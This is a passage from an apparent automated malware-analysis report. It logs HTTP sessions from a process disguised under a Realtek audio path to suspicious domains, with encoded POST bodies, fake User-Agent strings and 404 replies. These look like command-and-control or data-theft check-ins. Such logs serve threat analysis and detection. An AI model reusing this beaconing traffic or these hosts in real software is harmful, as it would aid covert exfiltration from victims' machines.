cfL4;desc="?proto=TCP&rtt=118829&min_rtt=118829&rtt_var=59414&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7968&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Jan 9, 2025 08:30:41.758486032 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49721	104.21.64.1	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:30:43.867697954 CET	540	OUT	GET /3u0p/?NvA=qUwPQPTQmTwyizTU&cOnShP=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ= HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:30:44.402524948 CET	922	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:30:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PjoBrH6GI0lMhP4sDHLE4C07XV5ZhJn1NHlbFwHcHE9FCmFKbtQnzS%2B5bcwWBDV8EVXjoNdT%2BdurhdilIdXNTOwikQzR7PitwNneySRO5CyFjGPZovYaMW6k6rAZkUH4x1wG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2b9409a4b6378-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=118859&min_rtt=118859&rtt_var=59429&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=540&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Jan 9, 2025 08:30:44.402535915 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49722	199.192.21.169	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:30:49.779701948 CET	793	OUT	POST /qps0/ HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.bokus.site Referer: http://www.bokus.site/qps0/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 32 4a 72 77 2f 65 56 54 2f 50 6a 54 68 4b 76 32 56 2b 4e 63 59 49 55 59 64 47 4c 71 62 67 50 74 6b 43 69 39 74 79 38 5a 30 6d 68 73 47 38 32 2b 73 6b 67 6c 79 4d 6f 6f 53 73 6c 36 4f 31 51 61 69 50 4a 63 32 63 70 39 4b 48 5a 4e 6f 46 4e 58 4a 5a 31 35 4c 6c 44 6d 34 43 32 51 5a 4d 48 6b 37 47 50 33 5a 75 6b 55 78 72 4f 6b 49 65 56 30 59 31 32 5a 6a 68 67 67 55 39 6d 46 2b 57 44 56 63 63 4b 44 48 4b 37 36 31 58 72 41 75 4b 76 68 35 7a 6d 70 39 45 39 43 4b 2f 7a 47 75 4e 6c 31 62 56 67 74 66 39 6c 6a 4d 4e 43 68 36 70 66 76 64 49 63 42 76 41 3d 3d Data Ascii: cOnShP=lcXtcPN+FJHJ2Jrw/eVT/PjThKv2V+NcYIUYdGLqbgPtkCi9ty8Z0mhsG82+skglyMooSsl6O1QaiPJc2cp9KHZNoFNXJZ15LlDm4C2QZMHk7GP3ZukUxrOkIeV0Y12ZjhggU9mF+WDVccKDHK761XrAuKvh5zmp9E9CK/zGuNl1bVgtf9ljMNCh6pfvdIcBvA==
Jan 9, 2025 08:30:49.972877026 CET	918	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:30:49 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	49723	199.192.21.169	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:30:52.486866951 CET	813	OUT	POST /qps0/ HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.bokus.site Referer: http://www.bokus.site/qps0/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 72 74 71 41 71 39 73 78 6b 5a 33 6d 68 73 56 38 32 37 69 45 67 79 79 4d 6b 4b 53 6f 6c 36 4f 32 73 61 69 4f 35 63 78 72 64 2b 49 58 5a 50 78 31 4e 56 44 35 31 35 4c 6c 44 6d 34 43 79 32 5a 4d 66 6b 37 57 66 33 66 38 41 62 37 4c 4f 6e 42 2b 56 30 50 46 32 64 6a 68 68 4e 55 38 71 76 2b 51 48 56 63 59 4f 44 48 59 54 31 67 6e 72 47 71 4b 75 4f 34 41 37 45 31 6e 6c 31 62 75 48 69 32 75 78 74 65 44 74 33 43 50 52 48 50 65 65 54 2b 5a 6d 48 66 4b 64 61 79 45 45 61 62 77 41 75 6b 31 72 62 64 49 41 7a 2f 5a 35 7a 51 7a 49 3d Data Ascii: cOnShP=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSrtqAq9sxkZ3mhsV827iEgyyMkKSol6O2saiO5cxrd+IXZPx1NVD515LlDm4Cy2ZMfk7Wf3f8Ab7LOnB+V0PF2djhhNU8qv+QHVcYODHYT1gnrGqKuO4A7E1nl1buHi2uxteDt3CPRHPeeT+ZmHfKdayEEabwAuk1rbdIAz/Z5zQzI=
Jan 9, 2025 08:30:52.682185888 CET	918	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:30:52 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	49724	199.192.21.169	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:30:55.185892105 CET	2578	OUT	POST /qps0/ HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.bokus.site Referer: http://www.bokus.site/qps0/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 6a 74 71 31 6d 39 6a 77 6b 5a 32 6d 68 73 57 38 32 41 69 45 67 76 79 4d 38 4f 53 6f 67 42 4f 7a 67 61 6a 6f 74 63 77 5a 31 2b 53 48 5a 50 73 46 4e 57 4a 5a 30 37 4c 6c 7a 69 34 42 61 32 5a 4d 66 6b 37 55 58 33 4a 65 6b 62 30 72 4f 6b 49 65 56 6f 59 31 32 35 6a 6e 49 34 55 38 2f 61 2b 68 37 56 64 34 65 44 46 72 37 31 38 33 72 45 74 4b 75 57 34 41 33 48 31 6e 70 66 62 74 62 59 32 74 68 74 65 6c 30 38 48 64 49 59 52 50 44 66 34 34 47 37 66 4c 70 2b 7a 32 59 66 62 77 67 46 39 41 76 4f 44 2b 41 49 37 4c 5a 37 54 47 42 4f 69 44 34 61 53 4e 4e 4a 43 39 2b 54 54 4c 68 6a 38 4a 34 47 56 4e 32 55 74 75 74 44 38 4b 78 48 4b 52 4e 33 4b 78 45 63 48 62 67 65 69 32 2b 33 62 4c 50 79 50 48 38 50 57 62 4e 4b 46 6c 59 38 30 5a 6f 65 42 42 4e 62 54 77 34 71 68 73 6e 69 53 37 74 38 33 73 41 34 45 6d 50 4a 54 53 31 76 4d 63 58 6a 6a 78 69 72 76 68 38 45 62 6b 72 51 6f 39 71 [TRUNCATED] Data Ascii: cOnShP=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSjtq1m9jwkZ2mhsW82AiEgvyM8OSogBOzgajotcwZ1+SHZPsFNWJZ07Llzi4Ba2ZMfk7UX3Jekb0rOkIeVoY125jnI4U8/a+h7Vd4eDFr7183rEtKuW4A3H1npfbtbY2thtel08HdIYRPDf44G7fLp+z2YfbwgF9AvOD+AI7LZ7TGBOiD4aSNNJC9+TTLhj8J4GVN2UtutD8KxHKRN3KxEcHbgei2+3bLPyPH8PWbNKFlY80ZoeBBNbTw4qhsniS7t83sA4EmPJTS1vMcXjjxirvh8EbkrQo9q5izW026YBV+a0eZTa5Gs4rwJ6Fl0UACMH0Dxw/Mo14s26X9Wvlq2w9L7kbvLEfaA9vELxYMKGHFX9VBnF0Y/rasbCSYe7NGYCzWbjOoOZiSIUgmYCXTUMec7Akv0IObf7p00fvMw084JAUjGjYA3+riLnwkO0kcaDekzygDHv6O5JtKIAq2vGtqYLGoyKLfqyu5E2qxqgOdpw10+X8BiG4OSeZZ1oLHMnCss21407VRW2+xGpvaIiWWuA+OIMeph4TiMETcMgXQtB9WxJvpzaotAi86271PilkISdxdBsBEg8cp69KMK9qghrB66gWLyp6+Ou9PEq8FZt1odZbYyjuFMCqGkPiFI0+j6dzyFt1rcJVPKwN+mPYlbJPwrGG1mh78QBnBXwksRWvX64Evq4akbAxx+K/KxhfjoevXYbLZ/0B2EpcdXh2zfi0Bi+0sRRp7J2YVojieH8H86+fqcIqqH6i0KFGuZ5BJgYuFFqr6XyJfU49ZwNPKfXtBakHFytUH5lZs1rqHtEObtOMAu/zTHMVWVa0ogY+7WI+k0VZq2Rh+I9pjLxOu48XR+sK++jKEcRxCCDzVlZ7Q/Thp7ENniqFFfapUoDeymYvYaumZogC33wF/tqwFvt9BkQDGtGvwVuqohEQ1V+I9ajsgYjpqG8o/a5qVAWY [TRUNCATED]
Jan 9, 2025 08:30:55.185915947 CET	3867	OUT	Data Raw: 4d 79 43 54 37 63 6a 2b 76 6f 5a 63 59 44 49 47 59 42 6d 44 74 63 78 7a 44 70 61 4c 52 71 77 32 43 36 71 30 6a 4a 57 4c 52 5a 32 43 2f 2f 37 2f 79 33 64 39 48 45 77 67 4b 76 73 43 38 6e 68 58 34 67 70 38 6e 55 2f 61 30 5a 62 70 38 73 56 75 76 5a Data Ascii: MyCT7cj+voZcYDIGYBmDtcxzDpaLRqw2C6q0jJWLRZ2C//7/y3d9HEwgKvsC8nhX4gp8nU/a0Zbp8sVuvZH+dtWUzEN8DO+1BURb7tsVVA3kZzAgNVRRHjpLe3sMMykvarpG7rNrUnHxJE5ulapuKsnaiwijaoV6r5XWCsfRfUXnwSVGakGvBhUleIM8tfWzYGbpsedBA+mH2Wf+wae5w5+su0+ZcwFJSS6c988pNKRFY9iFRwi
Jan 9, 2025 08:30:55.185981035 CET	1517	OUT	Data Raw: 45 47 35 79 35 42 59 55 57 4f 74 78 47 59 4d 69 4f 2b 57 6c 71 6d 55 4f 46 38 67 77 47 33 77 59 4b 6f 6a 71 77 64 52 4b 67 51 79 43 5a 38 4d 53 57 58 49 30 36 2f 6c 31 6a 50 4b 46 6f 34 61 6b 76 4d 72 2b 63 31 65 39 76 59 50 4a 43 6e 67 45 71 56 Data Ascii: EG5y5BYUWOtxGYMiO+WlqmUOF8gwG3wYKojqwdRKgQyCZ8MSWXI06/l1jPKFo4akvMr+c1e9vYPJCngEqV/Yn2kBDb8WhGFHbYT+7QT8jE0AXHHX03Z8jOdMEwEPWri7xSFKH9Tn+vNDCnNLcTpIwTrjyZx+VmK7E5SYJzq3CkvgaCfMr6jXtVwwN9IKYvfARfAA/BAOf6JR5Bquv1rwrMp/w/7cKFw1GDeDT+kb1GJS9Q0MgS3
Jan 9, 2025 08:30:55.380884886 CET	918	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:30:55 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.11.20	49725	199.192.21.169	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:30:57.887201071 CET	538	OUT	GET /qps0/?cOnShP=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&NvA=qUwPQPTQmTwyizTU HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:30:58.083355904 CET	933	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:30:57 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.11.20	49726	47.83.1.90	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:11.861418962 CET	796	OUT	POST /nkmx/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.givvjn.info Referer: http://www.givvjn.info/nkmx/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 44 71 4f 73 54 55 66 46 65 6a 79 37 35 43 77 54 35 41 39 45 73 5a 7a 53 70 32 59 68 49 71 6b 70 43 55 75 4c 76 33 65 2b 7a 61 6b 72 30 39 67 4f 34 35 49 72 4e 62 6c 48 6b 78 66 31 75 77 56 61 73 4c 45 58 52 49 4b 66 42 64 76 4b 59 63 72 47 37 7a 49 39 6d 44 55 49 76 4f 30 71 48 74 4c 38 45 6b 43 5a 56 77 4c 76 4f 4c 4c 2b 67 4f 50 51 37 44 6f 30 33 34 31 2b 6f 53 31 7a 31 78 6d 4d 75 57 47 42 77 4b 78 58 48 72 42 41 44 6f 65 50 6f 39 57 38 58 75 38 52 71 4d 57 38 71 2b 6b 69 51 36 74 45 4b 62 36 65 41 75 4f 71 6d 4c 42 72 6e 63 57 42 4e 41 3d 3d Data Ascii: cOnShP=TW4HYQMdIKn0DqOsTUfFejy75CwT5A9EsZzSp2YhIqkpCUuLv3e+zakr09gO45IrNblHkxf1uwVasLEXRIKfBdvKYcrG7zI9mDUIvO0qHtL8EkCZVwLvOLL+gOPQ7Do0341+oS1z1xmMuWGBwKxXHrBADoePo9W8Xu8RqMW8q+kiQ6tEKb6eAuOqmLBrncWBNA==
Jan 9, 2025 08:31:12.876347065 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 07:31:12 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.11.20	49727	47.83.1.90	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:14.683212042 CET	816	OUT	POST /nkmx/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.givvjn.info Referer: http://www.givvjn.info/nkmx/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 51 70 43 78 53 4c 75 31 32 2b 32 61 6b 72 38 64 67 50 6c 70 49 77 4e 62 59 6b 6b 31 58 31 75 77 78 61 73 4b 30 58 52 2f 2b 59 48 4e 76 49 55 38 72 45 2f 7a 49 39 6d 44 55 49 76 50 51 41 48 74 44 38 44 55 79 5a 58 53 7a 73 52 37 4c 68 6a 4f 50 51 74 7a 6f 77 33 34 31 63 6f 58 73 57 31 7a 4f 4d 75 54 69 42 78 59 4a 49 4f 72 42 4b 4d 49 66 4c 6b 34 7a 70 62 4e 77 6c 71 71 61 59 72 73 59 49 63 4d 67 65 58 70 4f 36 44 39 53 59 69 37 34 44 6c 65 58 61 51 45 59 64 46 41 48 36 4d 63 6a 38 68 46 52 67 4c 4c 46 4e 32 68 55 3d Data Ascii: 